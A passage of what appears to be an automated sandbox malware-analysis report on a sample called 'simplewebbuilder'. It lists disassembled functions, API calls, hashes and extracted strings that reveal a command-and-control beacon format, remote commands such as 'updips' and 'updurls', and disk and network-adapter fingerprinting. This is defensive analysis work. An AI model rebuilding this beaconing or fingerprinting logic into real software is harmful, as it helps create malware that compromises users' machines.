9c3f86 21471->21472 21472->21289 21474 9cae02 21473->21474 21478 9cae26 21473->21478 21475 9ca431 __filbuf 59 API calls 21474->21475 21474->21478 21476 9cae1f 21475->21476 21477 9ca455 __write 79 API calls 21476->21477 21477->21478 21478->21468 21480 9c403b 21479->21480 21481 9c4027 21479->21481 21483 9cadef __flush 79 API calls 21480->21483 21493 9c4037 21480->21493 21482 9c645b strtoxl 59 API calls 21481->21482 21484 9c402c 21482->21484 21485 9c4047 21483->21485 21486 9c54f5 strtoxl 9 API calls 21484->21486 21498 9cb89b 21485->21498 21486->21493 21489 9ca431 __filbuf 59 API calls 21490 9c4055 21489->21490 21502 9cb726 21490->21502 21492 9c405b 21492->21493 21494 9c3574 _free 59 API calls 21492->21494 21495 9c40f3 21493->21495 21494->21493 21496 9c9e61 __fsopen 2 API calls 21495->21496 21497 9c40f9 21496->21497 21497->21306 21499 9c404f 21498->21499 21500 9cb8a8 21498->21500 21499->21489 21500->21499 21501 9c3574 _free 59 API calls 21500->21501 21501->21499 21503 9cb732 CallCatchBlock 21502->21503 21504 9cb73f 21503->21504 21505 9cb756 21503->21505 21507 9c6427 __read_nolock 59 API calls 21504->21507 21506 9cb7e1 21505->21506 21508 9cb766 21505->21508 21509 9c6427 __read_nolock 59 API calls 21506->21509 21510 9cb744 21507->21510 21511 9cb78e 21508->21511 21512 9cb784 21508->21512 21513 9cb789 21509->21513 21514 9c645b strtoxl 59 API calls 21510->21514 21516 9d1287 ___lock_fhandle 60 API calls 21511->21516 21515 9c6427 __read_nolock 59 API calls 21512->21515 21517 9c645b strtoxl 59 API calls 21513->21517 21524 9cb74b CallCatchBlock 21514->21524 21515->21513 21518 9cb794 21516->21518 21519 9cb7ed 21517->21519 21520 9cb7a7 21518->21520 21521 9cb7b2 21518->21521 21522 9c54f5 strtoxl 9 API calls 21519->21522 21528 9cb801 21520->21528 21525 9c645b strtoxl 59 API calls 21521->21525 21522->21524 21524->21492 21526 9cb7ad 21525->21526 21543 9cb7d9 21526->21543 21529 9d1544 __lseeki64_nolock 59 API calls 21528->21529 21531 9cb80f 21529->21531 21530 9cb865 21531->21530 21533 9cb843 21531->21533 21536 9d1544 __lseeki64_nolock 59 API calls 21531->21536 21533->21530 21555 9d162d RtlLeaveCriticalSection 21543->21555 21556 40d67e 21557 40d684 21556->21557 21558 402a02 21557->21558 21559 40d6ea GetLastError 21557->21559 21559->21558 21560 40d953 LoadLibraryExA 21559->21560 21561 40d96a 21560->21561 21561->21561 21562 40283e 21565 401f64 FindResourceA 21562->21565 21564 402843 21566 401f86 GetLastError SizeofResource 21565->21566 21572 401f9f 21565->21572 21567 401fa6 LoadResource LockResource GlobalAlloc 21566->21567 21566->21572 21568 401fd2 21567->21568 21569 401ffb GetTickCount 21568->21569 21570 402005 GlobalAlloc 21569->21570 21570->21572 21572->21564

                                                                                                                            Executed Functions

                                                                                                                            Function 009B78A7 Relevance: 95.2, APIs: 41, Strings: 13, Instructions: 662networksleepfileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 9b78a7-9b78bf InternetOpenA 1 9b7985-9b798b 0->1 2 9b78c5-9b793c InternetSetOptionA * 3 call 9c50f0 InternetOpenUrlA 0->2 4 9b798d-9b7993 1->4 5 9b79a7-9b79b5 1->5 11 9b797e-9b797f InternetCloseHandle 2->11 12 9b793e 2->12 7 9b7999-9b79a6 call 9b5500 4->7 8 9b7995-9b7997 4->8 9 9b79bb-9b79df call 9c50f0 call 9b44b0 5->9 10 9b6cf0-9b6cf2 5->10 7->5 8->5 9->10 32 9b79e5-9b7a13 RtlEnterCriticalSection RtlLeaveCriticalSection call 9c293c 9->32 13 9b6cfb-9b6cfd 10->13 14 9b6cf4-9b6cf9 10->14 11->1 20 9b7942-9b7968 InternetReadFile 12->20 18 9b6d0a-9b6d3e RtlEnterCriticalSection RtlLeaveCriticalSection 13->18 19 9b6cff 13->19 21 9b6d04 Sleep 14->21 26 9b6d8e 18->26 27 9b6d40-9b6d4c 18->27 19->21 24 9b796a-9b7971 20->24 25 9b7973-9b797a InternetCloseHandle 20->25 21->18 24->20 25->11 29 9b6d92-9b8156 26->29 27->26 30 9b6d4e-9b6d5b 27->30 29->10 33 9b6d5d-9b6d61 30->33 34 9b6d63-9b6d64 30->34 39 9b7a69-9b7a84 call 9c293c 32->39 40 9b7a15-9b7a27 call 9c293c 32->40 36 9b6d68-9b6d8c call 9c50f0 * 2 33->36 34->36 36->29 48 9b7a8a-9b7a8c 39->48 49 9b7d43-9b7d55 call 9c293c 39->49 40->39 50 9b7a29-9b7a3b call 9c293c 40->50 48->49 51 9b7a92-9b7b4a call 9c35ac RtlEnterCriticalSection RtlLeaveCriticalSection call 9c50f0 * 5 call 9b44b0 * 2 48->51 58 9b7d9e-9b7db0 call 9c293c 49->58 59 9b7d57-9b7d59 49->59 50->39 60 9b7a3d-9b7a4f call 9c293c 50->60 115 9b7b4c-9b7b4e 51->115 116 9b7b87 51->116 71 9b7db2 call 9b65a9 58->71 72 9b7dd1-9b7de3 call 9c293c 58->72 59->58 62 9b7d5b-9b7d99 call 9c50f0 RtlEnterCriticalSection RtlLeaveCriticalSection 59->62 60->39 73 9b7a51-9b7a63 call 9c293c 60->73 62->10 78 9b7db7-9b7dcc call 9b6841 call 9b694c 71->78 83 9b7de9-9b7deb 72->83 84 9b8100-9b8112 call 9c293c 72->84 73->10 73->39 78->10 83->84 88 9b7df1-9b7e07 call 9b44b0 83->88 84->10 96 9b8118-9b8146 call 9c35ac call 9c50f0 call 9b44b0 84->96 88->10 100 9b7e0d-9b7edb call 9c2a18 call 9b1ba7 88->100 122 9b8148-9b814a call 9b5461 96->122 123 9b814f-9b8156 call 9c3574 96->123 113 9b7edd call 9b143f 100->113 114 9b7ee2-9b7f03 RtlEnterCriticalSection 100->114 113->114 119 9b7f0f-9b7f73 RtlLeaveCriticalSection call 9b3c67 call 9b3d7e call 9b8931 114->119 120 9b7f05-9b7f0c 114->120 115->116 121 9b7b50-9b7b62 call 9c293c 115->121 124 9b7b8b-9b7bb7 call 9c35ac call 9c50f0 call 9b44b0 116->124 147 9b7f79-9b7fc1 call 9bad1b 119->147 148 9b80e7-9b80fb call 9b95f9 119->148 120->119 121->116 136 9b7b64-9b7b85 call 9b44b0 121->136 122->123 123->10 145 9b7bb9-9b7bc8 call 9c3be6 124->145 146 9b7bf8-9b7c01 call 9c3574 124->146 136->124 145->146 161 9b7bca 145->161 159 9b7d39-9b7d3c 146->159 160 9b7c07-9b7c1f call 9c414c 146->160 157 9b80b1-9b80e2 call 9b89e0 call 9b33b2 147->157 158 9b7fc7-9b7fce 147->158 148->10 157->148 162 9b7fd1-9b7fd6 158->162 159->49 172 9b7c2b 160->172 173 9b7c21-9b7c29 call 9b9d2d 160->173 164 9b7bcf-9b7be1 call 9c2e50 161->164 162->162 166 9b7fd8-9b8023 call 9bad1b 162->166 178 9b7be3 164->178 179 9b7be6-9b7bf6 call 9c3be6 164->179 166->157 180 9b8029-9b802f 166->180 177 9b7c2d-9b7cd0 call 9bae45 call 9b3863 call 9b522d call 9b3863 call 9bb0eb call 9bb205 172->177 173->177 202 9b7cd5-9b7ce6 177->202 178->179 179->146 179->164 185 9b8032-9b8037 180->185 185->185 187 9b8039-9b8074 call 9bad1b 185->187 187->157 194 9b8076-9b80b0 call 9bd70d 187->194 194->157 203 9b7ce8 call 9b380b 202->203 204 9b7ced-9b7d18 Sleep call 9c1ef0 202->204 203->204 208 9b7d1a-9b7d23 call 9b4100 204->208 209 9b7d24-9b7d32 204->209 208->209 209->159 210 9b7d34 call 9b380b 209->210 210->159
                                                                                                                            APIs
                                                                                                                            • InternetOpenA.WININET(?), ref: 009B78B1
                                                                                                                            • InternetSetOptionA.WININET(00000000,00000002,?), ref: 009B78D9
                                                                                                                            • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 009B78F1
                                                                                                                            • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 009B7909
                                                                                                                            • _memset.LIBCMT ref: 009B7919
                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 009B7932
                                                                                                                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 009B7954
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 009B7974
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 009B797F
                                                                                                                            • _memset.LIBCMT ref: 009B79C7
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B79EA
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B79FB
                                                                                                                            • _malloc.LIBCMT ref: 009B7A94
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B7AA6
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B7AB2
                                                                                                                            • _memset.LIBCMT ref: 009B7ACC
                                                                                                                            • _memset.LIBCMT ref: 009B7ADE
                                                                                                                            • _memset.LIBCMT ref: 009B7AF1
                                                                                                                            • _memset.LIBCMT ref: 009B7B04
                                                                                                                            • _memset.LIBCMT ref: 009B7B1A
                                                                                                                            • _malloc.LIBCMT ref: 009B7B91
                                                                                                                            • _memset.LIBCMT ref: 009B7B9D
                                                                                                                            • _strtok.LIBCMT ref: 009B7BBF
                                                                                                                            • _swscanf.LIBCMT ref: 009B7BD6
                                                                                                                            • _strtok.LIBCMT ref: 009B7BED
                                                                                                                            • _free.LIBCMT ref: 009B7BF9
                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 009B7CF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet_memset$CriticalSection$Option$CloseEnterHandleLeaveOpen_malloc_strtok$FileReadSleep_free_swscanf
                                                                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                                                            • API String ID: 312459958-1839899575
                                                                                                                            • Opcode ID: e958a76d090e9733290a7bc173d00963a783d3a0c841cc4f6fc663645415d18e
                                                                                                                            • Instruction ID: 97c04fd3281e90212ac287469746f4cf242656ad85cb1abd23835b4313266f47
                                                                                                                            • Opcode Fuzzy Hash: e958a76d090e9733290a7bc173d00963a783d3a0c841cc4f6fc663645415d18e
                                                                                                                            • Instruction Fuzzy Hash: 0A32FF3154C381ABD730AB64CD45BEBBBE8AFC5720F10491EF589972A2DB709944CB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B69CB Relevance: 84.3, APIs: 42, Strings: 6, Instructions: 269memorysleeplibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.NTDLL(009E81E8), ref: 009B69FA
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009B6A11
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A1A
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009B6A29
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A2C
                                                                                                                            • GetTickCount.KERNEL32 ref: 009B6AAE
                                                                                                                            • GetVersionExA.KERNEL32(009E8038), ref: 009B6B1F
                                                                                                                            • _memset.LIBCMT ref: 009B6B3E
                                                                                                                            • _malloc.LIBCMT ref: 009B6B4B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B5B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B66
                                                                                                                            • _malloc.LIBCMT ref: 009B6B71
                                                                                                                            • _malloc.LIBCMT ref: 009B6B7C
                                                                                                                            • _malloc.LIBCMT ref: 009B6B89
                                                                                                                            • _malloc.LIBCMT ref: 009B6B94
                                                                                                                            • _malloc.LIBCMT ref: 009B6BA3
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 009B6BBA
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 009B6BC3
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009B6BD2
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 009B6BD5
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 009B6BE0
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 009B6BE3
                                                                                                                            • _memset.LIBCMT ref: 009B6BF6
                                                                                                                            • _memset.LIBCMT ref: 009B6C02
                                                                                                                            • _memset.LIBCMT ref: 009B6C0F
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B6C1D
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B6C2A
                                                                                                                            • _malloc.LIBCMT ref: 009B6C4E
                                                                                                                              • Part of subcall function 009C35AC: __FF_MSGBANNER.LIBCMT ref: 009C35C3
                                                                                                                              • Part of subcall function 009C35AC: __NMSG_WRITE.LIBCMT ref: 009C35CA
                                                                                                                              • Part of subcall function 009C35AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 009C35EF
                                                                                                                            • _malloc.LIBCMT ref: 009B6C5C
                                                                                                                            • _malloc.LIBCMT ref: 009B6C63
                                                                                                                            • _malloc.LIBCMT ref: 009B6C89
                                                                                                                            • QueryPerformanceCounter.KERNEL32(00000200), ref: 009B6C9C
                                                                                                                            • Sleep.KERNELBASE ref: 009B6CAA
                                                                                                                            • _malloc.LIBCMT ref: 009B6CB6
                                                                                                                            • _malloc.LIBCMT ref: 009B6CC3
                                                                                                                            • _memset.LIBCMT ref: 009B6CD8
                                                                                                                            • _memset.LIBCMT ref: 009B6CE8
                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 009B6D04
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B6D0F
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B6D20
                                                                                                                            • _memset.LIBCMT ref: 009B6D75
                                                                                                                            • _memset.LIBCMT ref: 009B6D84
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$PKC$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                                            • API String ID: 2251652938-2802142760
                                                                                                                            • Opcode ID: 32195a8e3e065df20c90d9b27492336c9ed849e8c52fd606f2212b73d31102f4
                                                                                                                            • Instruction ID: 7bfc38d5a8d0820469d6248dbaf78d93632f99d3c0eae137965e75d8c668c82e
                                                                                                                            • Opcode Fuzzy Hash: 32195a8e3e065df20c90d9b27492336c9ed849e8c52fd606f2212b73d31102f4
                                                                                                                            • Instruction Fuzzy Hash: D6A11271D68780AFD310AF34DC45B5B7BE8AF85750F01882EF588EB292DBB49940DB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 447 401b4b-401b68 LoadLibraryA 448 401c21-401c25 447->448 449 401b6e-401b7f GetProcAddress 447->449 450 401b85-401b8e 449->450 451 401c18-401c1b FreeLibrary 449->451 452 401b95-401ba5 GetAdaptersInfo 450->452 451->448 453 401ba7-401bb0 452->453 454 401bdb-401be3 452->454 457 401bc1-401bd7 call 402e70 call 4018cc 453->457 458 401bb2-401bb6 453->458 455 401be5-401beb call 402e56 454->455 456 401bec-401bf0 454->456 455->456 460 401bf2-401bf6 456->460 461 401c15-401c17 456->461 457->454 458->454 462 401bb8-401bbf 458->462 460->461 465 401bf8-401bfb 460->465 461->451 462->457 462->458 467 401c06-401c13 call 402e48 465->467 468 401bfd-401c03 465->468 467->452 467->461 468->467
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                                            • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                                            • API String ID: 514930453-3667123677
                                                                                                                            • Opcode ID: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                            • Instruction ID: 696171d77ced3da8e64ebdc8d7a45064a9ae827dbc58ea61f09f05304c00b930
                                                                                                                            • Opcode Fuzzy Hash: f04fd2f2c31c85b1ddcf0e808faa8b6d7f672c3a3302ce64426ede9c7fd27be0
                                                                                                                            • Instruction Fuzzy Hash: 6421D870940209AEDF219FA5CD447EF7BB8EF41304F0440BAD604B22E1E7789985CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BFF9D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 543 9bff9d-9bffc0 LoadLibraryA 544 9c0080-9c0087 543->544 545 9bffc6-9bffd4 GetProcAddress 543->545 546 9bffda-9bffea 545->546 547 9c0079-9c007a FreeLibrary 545->547 548 9bffec-9bfff8 GetAdaptersInfo 546->548 547->544 549 9bfffa 548->549 550 9c0030-9c0038 548->550 553 9bfffc-9c0003 549->553 551 9c003a-9c0040 call 9c3da8 550->551 552 9c0041-9c0046 550->552 551->552 555 9c0048-9c004b 552->555 556 9c0074-9c0078 552->556 557 9c000d-9c0015 553->557 558 9c0005-9c0009 553->558 555->556 560 9c004d-9c0052 555->560 556->547 562 9c0018-9c001d 557->562 558->553 561 9c000b 558->561 564 9c005f-9c006a call 9c414c 560->564 565 9c0054-9c005c 560->565 561->550 562->562 563 9c001f-9c002c call 9bfcec 562->563 563->550 564->556 570 9c006c-9c006f 564->570 565->564 570->548
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 009BFFB3
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 009BFFCC
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?), ref: 009BFFF1
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 009C007A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                                            • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                                            • API String ID: 514930453-3114217049
                                                                                                                            • Opcode ID: 4de22c386df0995df5fb6153a358f0eef0d796db067c9d3ff99baa9494dc0cfc
                                                                                                                            • Instruction ID: 8efa55a8b4fbd3d7cf5d18809960860bf99e9eb3eb05a96fb25a781ae8a6a2c7
                                                                                                                            • Opcode Fuzzy Hash: 4de22c386df0995df5fb6153a358f0eef0d796db067c9d3ff99baa9494dc0cfc
                                                                                                                            • Instruction Fuzzy Hash: D021B431E04209EBDB11DBA8C894BFEBBBCAF85310F1541AEE504E7241D7349E85CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BFE99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 628 9bfe99-9bfec4 CreateFileA 629 9bfeca-9bfedf 628->629 630 9bff95-9bff9c 628->630 631 9bfee2-9bff04 DeviceIoControl 629->631 632 9bff3d-9bff45 631->632 633 9bff06-9bff0e 631->633 636 9bff4e-9bff50 632->636 637 9bff47-9bff4d call 9c3da8 632->637 634 9bff10-9bff15 633->634 635 9bff17-9bff1c 633->635 634->632 635->632 640 9bff1e-9bff26 635->640 638 9bff8b-9bff94 FindCloseChangeNotification 636->638 639 9bff52-9bff55 636->639 637->636 638->630 642 9bff71-9bff7e call 9c414c 639->642 643 9bff57-9bff60 GetLastError 639->643 644 9bff29-9bff2e 640->644 642->638 652 9bff80-9bff86 642->652 643->638 646 9bff62-9bff65 643->646 644->644 648 9bff30-9bff3c call 9bfcec 644->648 646->642 649 9bff67-9bff6e 646->649 648->632 649->642 652->631
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 009BFEB8
                                                                                                                            • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 009BFEF6
                                                                                                                            • GetLastError.KERNEL32 ref: 009BFF57
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 009BFF8E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                                                            • API String ID: 3786717961-1180397377
                                                                                                                            • Opcode ID: 55e0598233610ddbb63944b3ff150e21a89be70958c4e96328e225eeba6ea324
                                                                                                                            • Instruction ID: 9e438454ca2d4428707e34b80242b468ba41a5c0b2c5dfba47aaf148ff6e258a
                                                                                                                            • Opcode Fuzzy Hash: 55e0598233610ddbb63944b3ff150e21a89be70958c4e96328e225eeba6ea324
                                                                                                                            • Instruction Fuzzy Hash: D431BE71D00219ABCB24DF94CE94AFEBBB8FB46720F20417AF504A3280DB705E45DB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 654 401a4f-401a77 CreateFileA 655 401b45-401b4a 654->655 656 401a7d-401a91 654->656 657 401a98-401ac0 DeviceIoControl 656->657 658 401ac2-401aca 657->658 659 401af3-401afb 657->659 660 401ad4-401ad9 658->660 661 401acc-401ad2 658->661 662 401b04-401b07 659->662 663 401afd-401b03 call 402e56 659->663 660->659 666 401adb-401af1 call 402e70 call 4018cc 660->666 661->659 664 401b09-401b0c 662->664 665 401b3a-401b44 FindCloseChangeNotification 662->665 663->662 669 401b27-401b34 call 402e48 664->669 670 401b0e-401b17 GetLastError 664->670 665->655 666->659 669->657 669->665 670->665 672 401b19-401b1c 670->672 672->669 675 401b1e-401b24 672->675 675->669
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                                                            • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                                                            • GetLastError.KERNEL32 ref: 00401B0E
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                                                            • String ID: \\.\PhysicalDrive0
                                                                                                                            • API String ID: 3786717961-1180397377
                                                                                                                            • Opcode ID: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                            • Instruction ID: 8e9e512524d6225b66ba562a13c5a7f417e6abf84bb9e2e9af9964b6e94f018c
                                                                                                                            • Opcode Fuzzy Hash: 9a51d72c64212108cf0fb8f9c627c34330b62c581036e300bcb78a8c4253e257
                                                                                                                            • Instruction Fuzzy Hash: CE318B71D01218EACB21EFA5CD849EFBBB8FF41750F20407AE514B22A0E7785E45CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B6973 Relevance: 84.3, APIs: 42, Strings: 6, Instructions: 267libraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RtlInitializeCriticalSection.NTDLL(009E81E8), ref: 009B69FA
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 009B6A11
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A1A
                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 009B6A29
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 009B6A2C
                                                                                                                            • GetTickCount.KERNEL32 ref: 009B6AAE
                                                                                                                            • GetVersionExA.KERNEL32(009E8038), ref: 009B6B1F
                                                                                                                            • _memset.LIBCMT ref: 009B6B3E
                                                                                                                            • _malloc.LIBCMT ref: 009B6B4B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B5B
                                                                                                                            • _malloc.LIBCMT ref: 009B6B66
                                                                                                                            • _malloc.LIBCMT ref: 009B6B71
                                                                                                                            • _malloc.LIBCMT ref: 009B6B7C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion_memset
                                                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$PKC$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                                            • API String ID: 2231600905-2802142760
                                                                                                                            • Opcode ID: 9f538885c1f2c3309950385e6ad8985e9d49f941f4ff3423bf288d08768535a4
                                                                                                                            • Instruction ID: d4c1a118862befbdc7fc3d1709cdfb2b77abd6cadfe9c813fad7f49af4ee7205
                                                                                                                            • Opcode Fuzzy Hash: 9f538885c1f2c3309950385e6ad8985e9d49f941f4ff3423bf288d08768535a4
                                                                                                                            • Instruction Fuzzy Hash: 5A912271D287809FD310AF34DC46B5B7BE8AF85750F01442EF548EB292DBB49940DB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B1CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105synchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009B1D11
                                                                                                                            • GetLastError.KERNEL32 ref: 009B1D23
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
